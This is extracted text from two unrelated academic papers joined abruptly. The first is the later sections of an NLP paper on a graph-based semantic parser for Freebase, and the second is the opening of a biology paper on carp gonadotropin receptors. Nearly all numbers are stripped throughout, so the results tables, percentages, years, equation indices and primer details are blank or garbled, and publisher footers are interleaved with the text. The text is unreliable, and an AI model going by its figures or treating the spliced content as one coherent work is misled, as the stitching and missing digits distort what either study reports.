setting. and type alignments. so, from graphs a and b, we obtain the edge alignment φedge(directed.arg , directed.arg , film.directed by.arg , film.directed by.arg ) and the subedge align- ments φedge(directed.arg , film.directed by.arg ) and φedge(directed.arg , film.directed by.arg ). in a similar fashion we extract type alignments (e.g., φtype(capital,location.city)). contextual features in addition to lexical alignments, we also use contextual features which essentially record words or word com- binations surrounding grounded edge labels. feature φevent records an event word and its grounded predicates (e.g., in figure c we extract features φevent(appear, performance.film) and φevent(appear, performance.actor). fea- ture φarg records a predicate and its argument words (e.g., φarg(performance.film,movie) in figure c). word combination features are ex- tracted from the parser’s dependency output. the feature φdep records a predicate and the dependencies of its event word (e.g., from the grounded version of figure b we extract features φdep(location.state.capital.arg ,capital,state) and φdep(location.state.capital.arg ,capital,state)). using such features, we are able to handle multiword predicates. lexical similarity we count the number of word stems shared by grounded and ungrounded edge labels e.g., in figure directed.arg and film.directed by.arg have one stem overlap (ignoring the argument labels arg and arg ). for a grounded graph, we compute φstem, the aggregate stem overlap count over all its grounded and ungrounded edge la- bels. we did not incorporate wordnet/wiktionary- based lexical similarity features but these were found fruitful in kwiatkowski et al. ( ). we also have a feature for stem overlap count between the grounded edge labels and the context words. graph connectivity features these features pe- nalize graphs with non-standard topologies. for ex- ample, we do not want a final graph with no edges. the feature value φhasedge is one if there exists at least one edge in the graph. we also have a fea- ture φnodecount for counting the number of connected we use the porter stemmer. domain #rels #types #triples #train #free #webq business m k film m k people m k all* m k table : domain-specific freebase statistics (*some relations/types/triples are shared across domains); number of training clueweb sentences; number of test questions in free and webquestions. nodes in the graph. finally, feature φcolloc captures the collocation of grounded edges (e.g., edges be- longing to a single complex fact are likely to co- occur; see figure b). experimental setup in this section we present our experimental set-up for assessing the performance of the semantic parser described above. we present the datasets on which our model was trained and tested, discuss implemen- tation details, and briefly introduce the models used for comparison with our approach. . data we evaluated our approach on the free (cai and yates, ) and webquestions (berant et al., ) datasets. free consists of questions and their meaning representations (written in a variant of lambda calculus) which we, however, do not use. the dataset represents domains covering freebase relations, with most domains containing fewer than questions. we report results on three domains, namely film, business, and people as these are relatively large in both free and freebase. webquestions consists of , question-answer pairs, , of which are reserved for testing. our experiments used a subset of webquestions representing the three target domains. we extracted domain-specific queries semi-automatically by identifying question- answer pairs with entities in target domain relations. in both datasets, named entities were disambiguated to freebase entities with a named entity lexicon. table presents descriptive statistics for each do- main. evaluating on all domains in freebase would free comes with a named entity lexicon. for webques- tions we hand-coded this lexicon. generate a very large number of queries for which denotations would have to be computed (the number of queries is linear in the number of domains and the size of training data). our system loads freebase us- ing virtuoso and queries it with sparql. virtuoso is slow in dealing with millions of queries indexed on the entire freebase, and is the only reason we did not work with the complete freebase. . implementation to train our model, we extracted sentences from clueweb which contain at least two entities as- sociated with a relation in freebase, and have an edge between them in the ungrounded graph. these were further filtered so as to remove sentences which do not yield at least one semantic parse without an uninstantiated entity variable. for example, the sen- tence avatar is directed by cameron would be used for training, whereas avatar directed by cameron re- ceived a critical review wouldn’t. in the latter case, any semantic parse will have an uninstantiated en- tity variable for review. table (train) shows the number of sentences we obtained. in order to train our semantic parser, we ini- tialized the alignment and type features (φedge and φtype, respectively) with the alignment lexicon weights. these weights are computed as follows. let count(r′,r) denote the number of pairs of enti- ties which are linked with edge r′ in freebase and edge r in clueweb sentences. we then estimate the probability distribution p(r′/r) = count(r ′,r) ∑i count(r ′ i,r) . analogously, we created a type alignment lexicon. the counts were collected from clueweb sen- tences containing pairs of entities linked with an edge in freebase (business k, film k, and people k). contextual features were initialized to − since most word contexts and grounded predi- cates/types do not appear together. all other features were set to . we used a beam-search algorithm to convert un- grounded graphs to grounded ones. the edges and types of each ungrounded graph are placed in a pri- ority queue. priority is based on edge/type tf-idf scores collected over clueweb . at each step, we pop an element from the queue and ground it in freebase. we rank the resulting grounded graphs us- http://virtuoso.openlinksw.com ing the perceptron model, and pick the n-best ones, where n is the beam size. we continue until the queue is empty. in our experiments we used a beam size of . we trained a single model for all the do- mains combined together. we ran the perceptron for iterations (around – million queries). at each training iteration we used , randomly selected sentences from the training corpus. . comparison systems we compared our graph-based semantic parser (henceforth graphparser) against two state-of- the-art systems both of which are open-domain and work with freebase. the semantic parser developed by kwiatkowski et al. ( ) (henceforth kcaz ) is learned from question-answer pairs and follows a two-stage procedure: first, a natural language sen- tence is converted to a domain-independent seman- tic parse and then grounded onto freebase using a set of logical-type equivalent operators. the opera- tors explore possible ways sentential meaning could be expressed in freebase and essentially transform logical form to match the target ontology. our ap- proach also has two steps (i.e., we first generate mul- tiple ungrounded graphs and then ground them to different freebase graphs). we do not use opera- tors to perform structure matching, rather we cre- ate multiple graphs and leave it up to the learner to find an appropriate grounding using a rich feature space. to give a specific example, their operator lit- eral to constant is equivalent to having named enti- ties for larger text chunks in our case. their operator split literal explores different edge possibilities in an event whereas we start with a clique and remove un- wanted edges. our approach has (almost) similar expressive power but is conceptually simpler. our second comparison system was the seman- tic parser of berant and liang ( ) (henceforth parasempre) which also uses qa pairs for train- ing and makes use of paraphrasing. given an in- put nl sentence, they first construct a set of logi- cal forms based on hand-coded rules, and then gen- erate sentences from each logical form (using gen- eration templates and a lexicon). pairs of logical forms and natural language are finally scored us- ing a paraphrase model consisting of two compo- nents. an association model determines whether they contain phrase pairs likely to be paraphrases system prec rec f mwg . . . kcaz . . . graphparser . . . table : experimental results on free . and a vector space model assigns a vector represen- tation for each sentence, and learns a scoring func- tion that ranks paraphrase candidates. our seman- tic parser employs a graph-based representation as a means of handling the mismatch between natu- ral language, whereas parasempre opts for a text- based one through paraphrasing. finally, we compared our semantic parser against a baseline which is based on graphs but em- ploys no learning. the baseline converts an un- grounded graph to a grounded one by replacing each ungrounded edge/type with the highest weighted grounded label creating a maximum weighted graph, henceforth mwg. both graphparser and the baseline use the same alignment lexicon (a weighted mapping from ungrounded to grounded labels). results table summarizes our results on free . as described earlier, we evaluated graphparser on a subset of the dataset representing three domains (business, film, and people). since this sub- set contains a relatively small number of instances ( in total), we performed -fold cross valida- tion with folds as development data , and one fold as test data. we report results averaged over all test folds. with respect to kcaz , we present re- sults with their cross-domain trained models, where training data from multiple domains is used to test foreign domains. kcaz used generic features like string similarity and knowledge base features which apply across domains and do not require in- domain training data. we do not report results with parasempre as the small number of training in- stances would put their method at a disadvantage. we treat a predicted query as correct if its denota- the development data is only used for model selection and for determining the optimal training iteration. we are grateful to tom kwiatkowski for supplying us with the output of their system. features free webq all . . −contextual . . −alignment . . −connectivity . . −similarity . . table : graphparser ablation results on free and webquestions development set. tion is exactly equal to the denotation of the manu- ally annotated gold query. as can be seen, graphparser outperforms kcaz and the mwg baseline by a wide margin. this is an encouraging result bearing in mind that our model does not use question-answer pairs. we should also point out that our domain relation set is larger compared to kcaz . we do not prune any of the relations in freebase, whereas kcaz use only relations and types from our three domains (see table ). we further performed a feature ab- lation study to examine the contribution of different feature classes. as shown in table , the most im- portant features are those based on lexical similar- ity, as also observed in kcaz . graph connectivity and lexical alignments are equally important (these features are absent from kcaz ). contextual fea- tures are not very helpful over and above alignment features which also encode contextual information. overall, generic features like lexical similarity are helpful only to a certain extent; the performance of graphparser improves considerably when addi- tional graph-related features are taken into account. we also analyzed the errors graphparser makes. % of these are caused by the c&c parser and are cases where it either returns no syntactic analysis or a wrong one. % of the errors are due to freebase inconsistencies. for example, our system answered the question how many stores are in nittany mall? with using the relation shop- ping center.number of stores whereas the gold stan- dard provides the answer counting all stores using the relation shopping center.store. around % of er- rors include structural mismatches between natural language and freebase; for the question who is the president of gap inc?, our method grounds president to a grounded type whereas in freebase it is repre- sented as a relation employment.job.title. the remain- system prec rec f mwg . . . parasempre . . . graphparser . . . graphparser + para . . . table : experimental results on webquestions. ing errors are miscellaneous. for example, the ques- tion what are some films on antarctica? receives two interpretations, i.e., movies filmed in antarctica or movies with antarctica as their subject. we next discuss our results on webquestions. parasempre was trained with , qa pairs (corresponding to our target domains) together with question paraphrases obtained from the paralex corpus (fader et al., ). while training parasempre, out-of-domain freebase relations and types were removed. both graphparser and parasempre were tested on the same set of in-domain qa pairs with exact answer match as the evaluation criterion. for development purposes, graphparser uses qa pairs. table displays our results. we observe that graphparser obtains a higher f against mwg and parasempre. dif- ferences in performance among these systems are less pronounced compared to free . this is for a good reason. webquestions is a challenging dataset, created by non-experts. the questions are not tailored to freebase in any way, they are more varied and display a wider vocabulary. as a result the mismatch between natural language and free- base is greater and the semantic parsing task harder. error analysis further revealed that parsing errors are responsible for % of the questions graph- parser fails to answer. another cause of er- rors is mismatches between natural language and freebase. around % of the questions are of the type where did x come from?, and our model an- swers with the individual’s nationality, whereas an- notators provide the birthplace (city/town/village) as the right answer. moreover, % of the ques- tions are of the type what does x do?, which the annotators answer with the individual’s profession. in natural language, we rarely attest constructions we used the sempre package (http://www-nlp. stanford.edu/software/sempre/) which does not use any hand-coded entity disambiguation lexicon. like x does dentist/researcher/actor. the proposed framework assumes that freebase and natural lan- guage are somewhat isomorphic, which is not al- ways true. an obvious future direction would be to paraphrase the questions so as to increase the num- ber of grounded and ungrounded graphs. as an illus- tration, we rewrote questions like where did x come from to what is x’s birth place, and what did x do to what is x’s profession and evaluated our model graphparser + para. as shown in table , even simple paraphrasing can boost performance. finally, table (third column) examines the con- tribution of different features on the webques- tions development dataset. interestingly, we ob- serve that contextual features are not useful and in fact slightly harm performance. we hypothesize that this is due to the higher degree of mismatch between natural language and freebase in this dataset. fea- tures based on similarity, graph connectivity, and lexical alignments are more robust and generally useful across datasets. discussion in this paper, we introduce a new semantic pars- ing approach for freebase. a key idea in our work is to exploit the structural and conceptual similari- ties between natural language and freebase through a common graph-based representation. we formal- ize semantic parsing as a graph matching problem and learn a semantic parser without using annotated question-answer pairs. we have shown how to ob- tain graph representations from the output of a ccg parser and subsequently learn their correspondence to freebase using a rich feature set and their deno- tations as a form of weak supervision. our parser yields state-of-the art performance on three large freebase domains and is not limited to question an- swering. we can create semantic parses for any type of nl sentences. our work brings together several strands of re- search. graph-based representations of sentential meaning have recently gained some attention in the literature (banarescu et al., ), and attempts to map sentences to semantic graphs have met with good inter-annotator agreement. our work is also closely related to kwiatkowski et al. ( ) and be- rant and liang ( ) who present open-domain se- mantic parsers based on freebase and trained on qa pairs. despite differences in formulation and model structure, both approaches have explicit mechanisms for handling the mismatch between natural language and the kb (e.g., using logical-type equivalent oper- ators or paraphrases). the mismatch is handled im- plicitly in our case via our graphical representation which allows for the incorporation of all manner of powerful features. more generally, our method is based on the assumption that linguistic structure has a correspondence to freebase structure which does not always hold (e.g., in who is the grandmother of prince william?, grandmother is not directly ex- pressed as a relation in freebase). additionally, our model fails when questions are too short with- out any lexical clues (e.g., what did charles darwin do? ). supervision from annotated data or paraphras- ing could improve performance in such cases. in the future, we plan to explore cluster-based semantics (lewis and steedman, ) to increase the robust- ness on unseen nl predicates. our work joins others in exploiting the connec- tions between natural language and open-domain knowledge bases. recent approaches in relation ex- traction use distant supervision from a knowledge base to predict grounded relations between two tar- get entities (mintz et al., ; hoffmann et al., ; riedel et al., ). during learning, they ag- gregate sentences containing the target entities, ig- noring richer contextual information. in contrast, we learn from each individual sentence taking into account all entities present, their relations, and how they interact. krishnamurthy and mitchell ( ) formalize semantic parsing as a distantly supervised relation extraction problem combined with a manu- ally specified grammar to guide semantic parse com- position. finally, our approach learns a model of seman- tics guided by denotations as a form of weak su- pervision. beyond semantic parsing (artzi and zettlemoyer, ; liang et al., ; clarke et al., ), feedback-based learning has been previously used for interpreting and following nl instructions (branavan et al., ; chen and mooney, ), playing computer games (branavan et al., ), and grounding language in the physical world (krishna- murthy and kollar, ; matuszek et al., ). lemma pos semantic class semantic category * vb*, in, to, pos event directed : (se\npx< >)/npy< > : λqλpλe.∃x∃y. directed.arg (e,x)∧directed.arg (e,y)∧p(x)∧q(y) * nn, nns type movie : np : λx.movie(x) * nnp*, prp* entity obama : np : λx.equal(x,obama) * rb* eventmod annually : se\se : λpλe.lexe.annually(e)∧p(e) * jj* typemod state : npx/npx : λpλx.lexx.state(x)∧p(x) be * copula be: (sy\npx)/npy : λqλpλy.∃x.lexy(x)∧p(x)∧q(y) the * unique the : npx/npx : λpλx.unique(x)∧p(x) * cd count twenty : nx/nx : λpλx.count(x, )∧p(x) twenty : nx/nx : λpλx.equal(x, )∧p(x) not, n’t * negation not : (se\npx)/(se\npx) : λpλqλe.∃x.negation(e)∧p(x,e)∧q(x) no * complement no : npx/nx : λpλx.complement(x)∧p(x) * wdt, wp*, question what : s[wq]e/(s[dcl]e\npx) wrb : λpλe.∃x.target(x)∧p(x,e) * wdt, wp*, closed which : (npx\npx)/(s[dcl]e\npx) wrb : λpλqλx.∃e.p(x,e)∧q(x) table : rules used to classify words into semantic classes. * represents a wild card expression which matches anything. lexx denotes the lexicalised form of x e.g., when state : npx/npx : λpλx.lexx.state(x)∧ p(x) is applied to capital : np : λy.capital(y), the lexicalised form of x becomes capital, and there- fore the predicate lexx.state becomes capital.state. the resulting semantic parse after application is λx.capital.state(x)∧capital(x). appendix we use a handful of rules to divide words into semantic classes. based on a word’s seman- tic class and indexed syntactic category, we con- struct its semantic category automatically. for example, directed is a member of the event class, and its indexed syntactic category is ((se\npx< >)/npy< >) (here, < > and < > in- dicate that x and y are the first and second ar- guments of e). we then generate its seman- tic category as λqλpλe.∃x∃y.directed.arg (e,x)∧ directed.arg (e,y)∧ p(x)∧ q(y). please refer to appendix b of clark and curran ( ) for a list of their indexed syntactic categories. the rules are described in table . syntactic cate- gories are not shown for the sake of brevity. most rules will match any syntactic category. excep- tions are copula-related rules (see be in the sixth row) which apply only to the syntactic category (s\np)/np, and rules pertaining to wh -words (see the last two rows in the table). when more than one rule apply, we end up with multiple semantic parses. there are a few cases like passives, question words, and prepositional phrases where we modified the original indexed categories for better interpretation of the semantics (these are not displayed here). we also handle non-standard ccg operators involving unary and binary rules as described in appendix a of clark and curran ( ). acknowledgements we are grateful to the anonymous reviewers for their valuable feedback on an earlier version of this paper. thanks to mike lewis and the members of ilcc for helpful discussions and comments. we acknowl- edge the support of eu erc advanced fellowship gramplus and eu ist cognitive sys- tems ip ec-fp - “xperience”. references artzi, yoav and luke zettlemoyer. . boot- strapping semantic parsers from conversations. in proceedings of the conference on empirical methods in natural language processing. edin- burgh, scotland, pages – . artzi, yoav and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping instructions to actions. transations of the associ- ation for computational linguistics ( ): – . banarescu, laura, claire bonial, shu cai, madalina georgescu, kira griffitt, ulf hermjakob, kevin knight, philipp koehn, martha palmer, and nathan schneider. . abstract meaning repre- sentation for sembanking. in proceedings of the th linguistic annotation workshop and interop- erability with discourse. sofia, bulgaria, pages – . berant, jonathan, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of the conference on empirical methods in nat- ural language processing. seattle, washington, usa, pages – . berant, jonathan and percy liang. . seman- tic parsing via paraphrasing. in proceedings of the nd annual meeting of the association for computational linguistics. baltimore, maryland, usa, pages – . bos, johan, stephen clark, mark steedman, james r. curran, and julia hockenmaier. . wide-coverage semantic representations from a ccg parser. in proceedings of coling . geneva, switzerland, pages – . branavan, s.r.k., harr chen, luke zettlemoyer, and regina barzilay. . reinforcement learn- ing for mapping instructions to actions. in pro- ceedings of the joint conference of the th an- nual meeting of the acl and the th international joint conference on natural language process- ing of the afnlp. suntec, singapore, pages – . branavan, s.r.k., nate kushman, tao lei, and regina barzilay. . learning high-level plan- ning from text. in proceedings of the th an- nual meeting of the association for computa- tional linguistics. jeju island, korea, pages – . cai, qingqing and alexander yates. . large- scale semantic parsing via schema matching and lexicon extension. in proceedings of the st annual meeting of the association for compu- tational linguistics. sofia, bulgaria, pages – . chen, david l. and raymond j. mooney. . learning to interpret natural language navigation instructions from observations. in proceedings of the th aaai conference on artificial intelli- gence. san francisco, california, pages – . clark, stephen and james r curran. . pars- ing the wsj using ccg and log-linear models. in proceedings of the nd annual meeting on asso- ciation for computational linguistics. barcelona, spain, pages – . clark, stephen and james r curran. . wide- coverage efficient statistical parsing with ccg and log-linear models. computational linguistics ( ): – . clark, stephen, julia hockenmaier, and mark steed- man. . building deep dependency structures with a wide-coverage ccg parser. in proceed- ings of the th annual meeting on association for computational linguistics. pages – . clarke, james, dan goldwasser, ming-wei chang, and dan roth. . driving semantic parsing from the world’s response. in proceedings of the th conference on natural language learning. uppsala, sweden, pages – . collins, michael. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proceedings of the conference on empir- ical methods in natural language processing. philadelphia, pennsylvania, pages – . fader, anthony, luke zettlemoyer, and oren et- zioni. . paraphrase-driven learning for open question answering. in proceedings of the st annual meeting of the association for computa- tional linguistics. sofia, bulgaria, pages – . gabrilovich, evgeniy, michael ringgaard, and amarnag subramanya. . facc : freebase annotation of clueweb corpora, version (re- lease date - - , format version , correc- tion level ). goldwasser, dan, roi reichart, james clarke, and dan roth. . confidence driven unsupervised semantic parsing. in proceedings of the th annual meeting of the association for compu- tational linguistics: human language technolo- gies. portland, oregon, usa, pages – . goldwasser, dan and dan roth. . learning from natural instructions. in proceedings of the nd international joint conference on artificial intelligence. barcelona, spain, pages – . hoffmann, raphael, congle zhang, xiao ling, luke s zettlemoyer, and daniel s weld. . knowledge-based weak supervision for informa- tion extraction of overlapping relations. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics: human language technologies. portland, oregon, usa, pages – . krishnamurthy, jayant and thomas kollar. . jointly learning to parse and perceive: connect- ing natural language to the physical world. tran- sations of the association for computational lin- guistics ( ): – . krishnamurthy, jayant and tom mitchell. . weakly supervised training of semantic parsers. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learn- ing. jeju island, korea, pages – . kwiatkowski, tom, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceed- ings of the conference on empirical meth- ods in natural language processing. seattle, washington, usa, pages – . kwiatkowski, tom, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of the conference on empirical methods in natural language processing. pages – . lewis, mike and mark steedman. . combined distributional and logical semantics. transactions of the association for computational linguistics : – . liang, percy, michael jordan, and dan klein. . learning dependency-based compositional se- mantics. in proceedings of the th annual meet- ing of the association for computational linguis- tics: human language technologies. portland, oregon, usa, pages – . matuszek, cynthia, nicholas fitzgerald, luke zettlemoyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded attribute learning. in proceedings of the th international conference on machine learn- ing. edinburgh, scotland, pages – . mintz, mike, steven bills, rion snow, and dan jurafsky. . distant supervision for relation extraction without labeled data. in proceedings of the joint conference of the th annual meet- ing of the association for computational linguis- tics and the th international joint conference on natural language processing of the asian fed- eration of natural language processing. pages – . parsons, terence. . events in the semantics of english. mit press, cambridge, ma. poon, hoifung. . grounded unsupervised se- mantic parsing. in proceedings of the st an- nual meeting of the association for computa- tional linguistics. sofia, bulgaria, pages – . riedel, sebastian, limin yao, andrew mccallum, and benjamin m marlin. . relation ex- traction with matrix factorization and universal schemas. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies. atlanta, georgia, pages – . steedman, mark. . the syntactic process. the mit press. wong, yuk wah and raymond mooney. . learning synchronous grammars for semantic parsing with lambda calculus. in proceedings of the th annual meeting of the association of computational linguistics. prague, czech re- public, pages – . yao, xuchen and benjamin van durme. . in- formation extraction over structured data: ques- tion answering with freebase. in proceedings of the nd annual meeting of the association for computational linguistics. baltimore, maryland, usa, pages – . zelle, john m and raymond j mooney. . learning to parse database queries using induc- tive logic programming. in proceedings of the national conference on artificial intelligence. portland, oregon, pages – . zettlemoyer, luke and michael collins. . on- line learning of relaxed ccg grammars for pars- ing to logical form. in proceedings of the joint conference on empirical methods in natu- ral language processing and computational nat- ural language learning. prague, czech repub- lic, pages – . zettlemoyer, luke s. and michael collins. . learning to map sentences to logical form: struc- tured classification with probabilistic categorial grammars. in proceedings of st conference in uncertainilty in artificial intelligence. edin- burgh, scotland, pages – . : – l hollander-cohen et al. ontogeny of the specificity of fish gth-rs research ontogeny of the specificity of gonadotropin receptors and gene expression in carp lian hollander-cohen, benjamin böhm, krist hausken and berta levavi-sivan department of animal sciences, the robert h. smith faculty of agriculture, food, and environment, hebrew university of jerusalem, rehovot, israel correspondence should be addressed to b levavi-sivan: berta.sivan@mail.huji.ac.il abstract the pituitary gonadotropins, luteinizing hormone (lh) and follicle-stimulating hormone (fsh), are the principle endocrine drivers of reproductive processes in the gonads of jawed vertebrates. canonically, fsh recruits and maintains selected ovarian follicles for maturation and lh induces the stages of germinal vesicle breakdown and ovulation. in mammals, lh and fsh specifically activate cognate g-protein-coupled receptors that affect the proteins involved in steroidogenesis, protein hormone synthesis, and gametogenesis. this dual-gonadotropin model also exists in some fish species, but not in all. in fact, due to their diverse number of species, extended number of ecological niches, and remarkably flexible reproductive strategies, fish are appropriate as models to understand the co-evolution of gonadotropins and their receptors. in this study, we cloned and characterized the expression profile over the final stages of ovarian maturation of carp (cyprinus carpio) lhcgr and fshr. expression of both gonadotropin receptors increased in the later stage of early vitellogenesis, suggesting that both lh and fsh play a role in the development of mature follicles. we additionally tested the activation of clhcgr and cfshr using homologous and heterologous recombinant gonadotropins in order to gain insight into an evolutionary model of permissive gonadotropin receptor function. these data suggest that carp (cyprinus carpio) gonad development and maturation depends on a specific gonadotropin profile that does not reflect the temporally distinct dual-gonadotropin model observed in salmonids or mammals, and that permissive gonadotropin receptor activation is a specific feature of ostariophysi, not all teleosts. introduction the brain–pituitary–gonad axis is a signaling cascade of hormones and their receptors that regulates reproduction in all jawed vertebrates. a milieu of stimulatory and inhibitory neuropeptides throughout different nuclei of the brain culminate in a signal to the pituitary gland to release the gonadotropins (gths). the pituitary gths include follicle- stimulating hormone (fsh) and luteinizing hormone (lh), and together are responsible for gametogenesis, steroidogenesis, protein hormone synthesis, and ovulation throughout the time-sensitive process of gonad maturation. generally speaking, circulating fsh levels are higher during gonad development and maturation, and circulating lh levels rise during the final stages of maturation and ovulation ( ). gths are heterodimeric proteins belonging to the cysteine-knot family, each consisting of a common α-subunit and a functionally specific β-subunit that provides binding specificity to their cognate receptors ( ). fsh and lh exert their actions through the activation of specific g protein-coupled receptors (gpcrs) in the gonads. glycoprotein hormone receptors (gphrs) constitute subfamily a of the gpcrs and include the lh receptor (lhcgr), fsh receptor (fshr), and thyroid-stimulating hormone receptor (tshr). the gphrs are characterized - - key words f luteinizing hormone (lh) f follicle-stimulating hormone (fsh) f estradiol f ostariophysi f gpcr f dihydroxyprogesterone ( α, β, dihydroxy- - pregnen, -one; dhp) endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:berta.sivan@mail.huji.ac.il https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : by a large n-terminal extracellular domain (ecd) that contains several leucine-rich repeat motifs (lrrs) and a low complexity ‘hinge region‘ responsible for the selective and high-affinity binding of cognate hormones ( ). the gphrs canonically contain a seven transmembrane domain that undergoes a conformational change upon hormone binding to the ecd, revealing binding sites in the intracellular domain (id) for g-protein interactions and arrestin-dependent receptor desensitization ( ). ostariophysi is the second-largest superorder of teleost fish and includes siluriformes (catfishes) and cyprinidae (carps). this group represents species, % of freshwater species and % of known global fish species, and can be found on all major continents. the common carp is considered to be one of the most important aquaculture species globally ( ), which is why we sought to characterize and study the gonadotropin receptors of this fish. we first cloned the cfshr and lhcgr and studied their expression profile throughout the annual reproductive cycle. we then aimed to study the specific role of each of the carp gonadotropins at the final stages of oocyte maturation. we further studied the promiscuity of the cloned carp gthrs by stimulation with homologous and heterologous recombinant fish gonadotropins in an attempt to build an evolutionary model of gonadotropin specificity. the accumulated results are interpreted to identify if different piscine reproductive strategies are driven by or a result of permissive gonadotropin actions. materials and methods cloning of cfshr and clhcgr and phylogenetic analysis carp total rna extraction, synthesis of first cdna strand, pcr procedure and cloning into a pgemt easy vector were performed according to hollander et al. ( ) and biran et al. ( ). first- and second-strand cdna were synthesized by means of ′ and ′ race pcr protocol with the smart race cdna amplification kit (clontech). the complete sequence of the receptor cdnas were confirmed by sequence analysis of separate clones. to obtain the full length, we used start and stop primers for each receptor (table ). complete cdnas were translated into the respective proteins and aligned to sequences of other organisms (accession numbers detailed in supplementary table , see section on supplementary data given at the end of this article) using the muscle method in the mega program (molecular evolutionary genetics analysis, software version . . ). the evolutionary history was inferred by using the maximum likelihood method based on the jtt matrix-based model ( ). initial tree(s) for the heuristic search were obtained automatically by applying neighbor-join and bionj algorithms to a matrix of pairwise distances estimated using a jtt model, and then selecting the topology with superior log likelihood value. a discrete gamma distribution was used to model evolutionary rate differences among sites ( categories (+g, parameter = . )). the rate variation model allowed table  primers used for cloning carp gonadotropin receptors. primer position sequence ′– ′ use cfshr r gtccagaacgatggggccttcagctcc pcr/ ′ race cloning cfshr f cacaccagatgcattcaacc pcr cloning cfshr r gcggcttgaaaagagcactaggagg pcr/ ′ race cloning cfshr r gaaccagattagaacccgcaggaatg pcr/ ′ race cloning cfshr f ggccacctctgtctactctc pcr cloning cfshr start atggtcttg ttgatgatgc tg full cloning cfshr stop tcagtacacttgggtgatgtg full cloning clhcgr f gaacaaca aagagccgcg tgtgattc pcr cloning clhcgr r catccagcatagtggggccaaacgc pcr/ ′ race cloning clhcgr f ctgagcatctccaacactgg pcr cloning clhcgr r cagagtgaacgctgaacgagccacca pcr/ ′ race cloning clhcgr r ggaaagccccgacgttgaacagc pcr/ ′ race cloning clhcgr start tga agacaatacg ggaca atgctgag full cloning clhcgr stop cta cac cct ttg cat ctg tgg full cloning upm ctaatacgactcactataggggc ′ race cloning nupm aagcaagttggtatcaacgcagagt ′ race cloning ′-race cds aagcagtggtatcaacgcagagtac(t) vn ′ race cloning ′-race cds (t) vn ′ race cloning the position represents the location of the primer in the final sequence. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : for some sites to be evolutionarily invariable ([+i], . % sites). the bootstrap consensus tree was inferred from replicates. the analysis involved amino acid sequences. evolutionary analyses were conducted in mega ( ). structural modeling of cfshr and clhcgr three-dimensional models of clhcgr and cfshr were plotted using the i-tasser server ( , ) with the default i-tasser parameters. each receptor was divided into two domains; extracellular domain (nucleotides – for cfshr and – for clhcgr) and transmembrane domain which included the cytoplasmic domain (nucleotides – for cfshr and – for clhcgr). domain prediction was performed using phobius (http://phobius.sbc.su.se/). visualization and super positioning of the models were performed using swiss-pdb viewer (http://spdbv.vital-it. ch/). the position of each extracellular domain in relation to its transmembrane was decided arbitrarily. fish for the in vivo studies, common carp from the same long- term experiment previously published ( ) were used. in short, fish were reared in earthen fishponds in kibbutz dan (upper galilee, israel; ° ′n, ° ′e), under standard israeli aquaculture ( ). eight to ten female fish were sampled monthly from september until august . their body weight (bw) and gonad weight (gw) were measured for gonadosomatic index (gsi) calculations, blood was withdrawn from the caudal vessels, and pituitary and gonads were collected into rna later (life technologies). pituitaries were also collected into % ethanol for protein extraction and gonadal fragments were fixed in bouin’s fluid for histology ( ). pubertal stage of the fish gonads was determined according to histology ( , , , ). four stages were identified: i, primary growth (pg)+ previtellogenic (pv); ii, early vitellogenic (ev); iii, mid-vitellogenic (mv); and iv, mature follicles (mfs). for in vitro studies, fish (n = , bw = . ± . kg) were kept indoor in a recirculating system in l tanks at °c and a photoperiod of -h light. all experimental procedures complied with and were approved by the animal care and use guidelines of the hebrew university and were also approved by the local administrative panel on laboratory animal care (ag- - ). rna extraction and real-time pcr total rna was extracted from the gonads using trizol reagent (invitrogen) according to the manufacturer’s protocol, and integrity and quality of the purified rna samples were evaluated by gel electrophoresis and nanodrop, respectively. cdna was prepared as described previously ( ). to assess the relative expression of clhcgr and cfshr mrnas, mrna levels were normalized against the geometric mean of two endogenous reference genes, ef α and β-actin, using the comparative threshold cycle method (−∆ct). the mrna expression levels of both ef α and β-actin were stable among all stages of oogenesis in the carp (supplementary fig. ), as previously reported for tilapia ( ) and coho salmon ( ). the rt quantitative pcr procedure was as described previously ( , ). six serial dilutions ( : ) were prepared from a gonad cdna pool (n = fish), and the efficiencies of the specific gene amplifications were calculated by plotting ct versus log template. amplification was carried out in a lightcycler® system (roche), according to the manufacturer’s protocol. all qpcr products were purified and sequenced in order to confirm that the correct targets were amplified. validation of the rt-pcr: the dissociation curve analysis, absence of genomic dna and the reverse-transcriptase negative control, were conducted as described previously ( ). to improve presentation of results, the mean value of the primary growth (pg) stage was set to , so all normalized data are divided by the mean of this stage. tissue distribution of carp lhcgr and fshr tissue samples were collected from three male and three female carp at different reproduction stages. two micrograms of total rna were extracted from each of the following tissues: the caudal brain, front brain, mid-brain, pituitary gland, spleen, gills, kidneys, muscles, fat, ovaries/ testis, retina, heart, caudal and front intestines, and liver. cdna samples were prepared as described previously ( ). the tissue expression patterns of clhcgr and cfshr in the various tissues were analyzed by rt-pcr with the primer sets described in table . cos- reporter assays transient transfection, cell procedures, and stimulation protocols were generally performed as described previously ( , , ). briefly, cos- cells were grown in dmem until confluent. co-transfection of the receptors ( µg/plate for cfshr and . µg/plate for clh) and a camp- response element-luciferase (cre-luc) reporter plasmid (at µg/plate) was carried out with transit-x ® system (mirus). the cells were serum-starved for h, stimulated with various stimulants for h, and then harvested and this work is licensed under a creative 